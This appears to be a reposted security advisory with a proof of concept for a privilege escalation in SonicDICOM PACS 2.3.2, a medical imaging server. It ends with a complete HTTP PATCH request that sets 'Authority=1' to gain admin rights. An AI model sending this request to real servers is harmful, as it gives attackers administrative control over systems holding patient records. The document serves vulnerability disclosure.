42 lines
No EOL
1.2 KiB
Text
42 lines
No EOL
1.2 KiB
Text
SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit
|
|
|
|
|
|
Vendor: JIUN Corporation
|
|
Product web page: https://www.sonicdicom.com
|
|
Affected version: 2.3.2 and 2.3.1
|
|
|
|
Summary: SonicDICOM is PACS software that combines the capabilities of
|
|
DICOM Server with web browser based DICOM Viewer.
|
|
|
|
Desc: The application suffers from a privilege escalation vulnerability.
|
|
Normal user can elevate his/her privileges by sending a HTTP PATCH request
|
|
seting the parameter 'Authority' to integer value '1' gaining admin rights.
|
|
|
|
Tested on: Microsoft-HTTPAPI/2.0
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2017-5396
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5396.php
|
|
|
|
22.11.2016
|
|
|
|
--
|
|
|
|
PATCH /viewer/api/accounts/update HTTP/1.1
|
|
Host: 172.19.0.214
|
|
Content-Length: 37
|
|
Cache-Control: max-age=0
|
|
Upgrade-Insecure-Requests: 1
|
|
User-Agent: Escalation Browser/1.0
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.8
|
|
Cookie: {REMOVED_FOR_BREVITY}
|
|
Connection: close
|
|
|
|
Id=testingus&Name=peend&Authority=1 |